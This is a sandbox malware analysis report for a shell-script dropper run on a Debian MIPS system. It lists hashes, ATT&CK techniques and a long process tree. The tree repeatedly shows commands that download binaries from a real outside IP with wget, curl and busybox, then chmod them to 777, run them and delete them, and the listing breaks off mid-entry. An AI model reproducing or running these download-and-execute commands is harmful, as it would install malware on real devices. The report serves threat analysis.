85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a

Analysis

max time kernel
108s
max time network
138s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
20/11/2024, 02:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh
Size

10KB
MD5

2867f6118ccdde38169e7da22f50cedd
SHA1

00951ed155bfbaa967281a3ea76774460f9bafae
SHA256

85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a
SHA512

3d85eb875e6a34c4142b2ea8dbf99fc182da866c339a858454a7d5f2aadbd30e3b36d838bc9d46978d7857257142d5f8294a8c295f23ee0e01028f28ec95f536
SSDEEP

96:rXlpNrClcsAv5FGwoy2dy18A2y5N7wGS0ojRJlpNrClc92:bCABFGwo8bNx

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
883	chmod
811	chmod
973	chmod
751	chmod
857	chmod
967	chmod
901	chmod
907	chmod
979	chmod
830	chmod
865	chmod
949	chmod
955	chmod
744	chmod
871	chmod
889	chmod
913	chmod
925	chmod
937	chmod
919	chmod
943	chmod
985	chmod
773	chmod
817	chmod
877	chmod
895	chmod
931	chmod
961	chmod

Executes dropped EXE 28 IoCs

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 10 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
906	busybox
909	rm
888	busybox
904	wget
905	curl
891	rm
908	aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
886	wget
887	curl
890	aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf	curl
File opened for modification	/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss	curl
File opened for modification	/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok	curl
File opened for modification	/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0	curl
File opened for modification	/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss	curl
File opened for modification	/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw	curl
File opened for modification	/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE	curl
File opened for modification	/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw	curl
File opened for modification	/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw	curl
File opened for modification	/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR	curl
File opened for modification	/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR	curl
File opened for modification	/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5	curl
File opened for modification	/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5	curl
File opened for modification	/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao	curl
File opened for modification	/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in	curl
File opened for modification	/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo	curl
File opened for modification	/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0	curl
File opened for modification	/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P	curl
File opened for modification	/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5	curl
File opened for modification	/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5	curl
File opened for modification	/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw	curl
File opened for modification	/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok	curl
File opened for modification	/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in	curl
File opened for modification	/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao	curl
File opened for modification	/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo	curl
File opened for modification	/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf	curl
File opened for modification	/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE	curl
File opened for modification	/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P	curl

/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh
/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh
1⤵
PID:713
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:719
- /usr/bin/wget
  wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
  2⤵
  PID:722
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:740
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
  2⤵
  PID:743
- /bin/chmod
  chmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
  2⤵
  - File and Directory Permissions Modification
  PID:744
- /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
  ./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
  2⤵
  - Executes dropped EXE
  PID:745
- /bin/rm
  rm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
  2⤵
  PID:746
- /usr/bin/wget
  wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
  2⤵
  PID:747
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:748
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
  2⤵
  PID:750
- /bin/chmod
  chmod 777 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
  2⤵
  - File and Directory Permissions Modification
  PID:751
- /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
  ./QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
  2⤵
  - Executes dropped EXE
  PID:752
- /bin/rm
  rm QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
  2⤵
  PID:753
- /usr/bin/wget
  wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
  2⤵
  PID:754
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:757
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
  2⤵
  PID:764
- /bin/chmod
  chmod 777 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
  2⤵
  - File and Directory Permissions Modification
  PID:773
- /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
  ./MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
  2⤵
  - Executes dropped EXE
  PID:774
- /bin/rm
  rm MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
  2⤵
  PID:777
- /usr/bin/wget
  wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
  2⤵
  PID:779
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:799
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
  2⤵
  PID:809
- /bin/chmod
  chmod 777 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
  2⤵
  - File and Directory Permissions Modification
  PID:811
- /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
  ./7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
  2⤵
  - Executes dropped EXE
  PID:812
- /bin/rm
  rm 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
  2⤵
  PID:813
- /usr/bin/wget
  wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
  2⤵
  PID:814
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:815
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
  2⤵
  PID:816
- /bin/chmod
  chmod 777 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
  2⤵
  - File and Directory Permissions Modification
  PID:817
- /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
  ./mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
  2⤵
  - Executes dropped EXE
  PID:818
- /bin/rm
  rm mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
  2⤵
  PID:819
- /usr/bin/wget
  wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
  2⤵
  PID:820
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:821
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
  2⤵
  PID:824
- /bin/chmod
  chmod 777 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
  2⤵
  - File and Directory Permissions Modification
  PID:830
- /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
  ./3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
  2⤵
  - Executes dropped EXE
  PID:831
- /bin/rm
  rm 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
  2⤵
  PID:835
- /usr/bin/wget
  wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
  2⤵
  PID:836
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:843
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
  2⤵
  PID:852
- /bin/chmod
  chmod 777 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
  2⤵
  - File and Directory Permissions Modification
  PID:857
- /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
  ./WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
  2⤵
  - Executes dropped EXE
  PID:859
- /bin/rm
  rm WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
  2⤵
  PID:861
- /usr/bin/wget
  wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
  2⤵
  PID:862
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:863
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
  2⤵
  PID:864
- /bin/chmod
  chmod 777 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
  2⤵
  - File and Directory Permissions Modification
  PID:865
- /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
  ./DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
  2⤵
  - Executes dropped EXE
  PID:866
- /bin/rm
  rm DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
  2⤵
  PID:867
- /usr/bin/wget
  wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
  2⤵
  PID:868
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:869
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
  2⤵
  PID:870
- /bin/chmod
  chmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
  2⤵
  - File and Directory Permissions Modification
  PID:871
- /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
  ./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
  2⤵
  - Executes dropped EXE
  PID:872
- /bin/rm
  rm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
  2⤵
  PID:873
- /usr/bin/wget
  wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
  2⤵
  PID:874
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:875
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
  2⤵
  PID:876
- /bin/chmod
  chmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
  2⤵
  - File and Directory Permissions Modification
  PID:877
- /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
  ./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
  2⤵
  - Executes dropped EXE
  PID:878
- /bin/rm
  rm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
  2⤵
  PID:879
- /usr/bin/wget
  wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
  2⤵
  PID:880
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:881
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
  2⤵
  PID:882
- /bin/chmod
  chmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
  2⤵
  - File and Directory Permissions Modification
  PID:883
- /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
  ./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
  2⤵
  - Executes dropped EXE
  PID:884
- /bin/rm
  rm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
  2⤵
  PID:885
- /usr/bin/wget
  wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
  2⤵
  - System Network Configuration Discovery
  PID:886
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:887
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
  2⤵
  - System Network Configuration Discovery
  PID:888
- /bin/chmod
  chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
  2⤵
  - File and Directory Permissions Modification
  PID:889
- /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
  ./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:890
- /bin/rm
  rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
  2⤵
  - System Network Configuration Discovery
  PID:891
- /usr/bin/wget
  wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
  2⤵
  PID:892
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:893
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
  2⤵
  PID:894
- /bin/chmod
  chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
  2⤵
  - File and Directory Permissions Modification
  PID:895
- /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
  ./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
  2⤵
  - Executes dropped EXE
  PID:896
- /bin/rm
  rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
  2⤵
  PID:897
- /usr/bin/wget
  wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
  2⤵
  PID:898
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:899
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
  2⤵
  PID:900
- /bin/chmod
  chmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
  2⤵
  - File and Directory Permissions Modification
  PID:901
- /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
  ./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
  2⤵
  - Executes dropped EXE
  PID:902
- /bin/rm
  rm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
  2⤵
  PID:903
- /usr/bin/wget
  wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
  2⤵
  - System Network Configuration Discovery
  PID:904
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:905
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
  2⤵
  - System Network Configuration Discovery
  PID:906
- /bin/chmod
  chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
  2⤵
  - File and Directory Permissions Modification
  PID:907
- /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
  ./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:908
- /bin/rm
  rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
  2⤵
  - System Network Configuration Discovery
  PID:909
- /usr/bin/wget
  wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
  2⤵
  PID:910
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:911
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
  2⤵
  PID:912
- /bin/chmod
  chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
  2⤵
  - File and Directory Permissions Modification
  PID:913
- /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
  ./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
  2⤵
  - Executes dropped EXE
  PID:914
- /bin/rm
  rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
  2⤵
  PID:915
- /usr/bin/wget
  wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
  2⤵
  PID:916
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:917
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
  2⤵
  PID:918
- /bin/chmod
  chmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
  2⤵
  - File and Directory Permissions Modification
  PID:919
- /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
  ./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
  2⤵
  - Executes dropped EXE
  PID:920
- /bin/rm
  rm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
  2⤵
  PID:921
- /usr/bin/wget
  wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
  2⤵
  PID:922
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:923
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
  2⤵
  PID:924
- /bin/chmod
  chmod 777 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
  2⤵
  - File and Directory Permissions Modification
  PID:925
- /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
  ./WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
  2⤵
  - Executes dropped EXE
  PID:926
- /bin/rm
  rm WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
  2⤵
  PID:927
- /usr/bin/wget
  wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
  2⤵
  PID:928
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:929
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
  2⤵
  PID:930
- /bin/chmod
  chmod 777 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
  2⤵
  - File and Directory Permissions Modification
  PID:931
- /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
  ./DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
  2⤵
  - Executes dropped EXE
  PID:932
- /bin/rm
  rm DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
  2⤵
  PID:933
- /usr/bin/wget
  wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
  2⤵
  PID:934
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:935
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
  2⤵
  PID:936
- /bin/chmod
  chmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
  2⤵
  - File and Directory Permissions Modification
  PID:937
- /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
  ./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
  2⤵
  - Executes dropped EXE
  PID:938
- /bin/rm
  rm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
  2⤵
  PID:939
- /usr/bin/wget
  wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
  2⤵
  PID:940
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:941
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
  2⤵
  PID:942
- /bin/chmod
  chmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
  2⤵
  - File and Directory Permissions Modification
  PID:943
- /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
  ./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
  2⤵
  - Executes dropped EXE
  PID:944
- /bin/rm
  rm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
  2⤵
  PID:945
- /usr/bin/wget
  wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
  2⤵
  PID:946
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:947
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
  2⤵
  PID:948
- /bin/chmod
  chmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
  2⤵
  - File and Directory Permissions Modification
  PID:949
- /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
  ./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
  2⤵
  - Executes dropped EXE
  PID:950
- /bin/rm
  rm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
  2⤵
  PID:951
- /usr/bin/wget
  wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
  2⤵
  PID:952
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:953
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
  2⤵
  PID:954
- /bin/chmod
  chmod 777 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
  2⤵
  - File and Directory Permissions Modification
  PID:955
- /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
  ./mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
  2⤵
  - Executes dropped EXE
  PID:956
- /bin/rm
  rm mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
  2⤵
  PID:957
- /usr/bin/wget
  wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
  2⤵
  PID:958
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:959
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
  2⤵
  PID:960
- /bin/chmod
  chmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
  2⤵
  - File and Directory Permissions Modification
  PID:961
- /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
  ./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
  2⤵
  - Executes dropped EXE
  PID:962
- /bin/rm
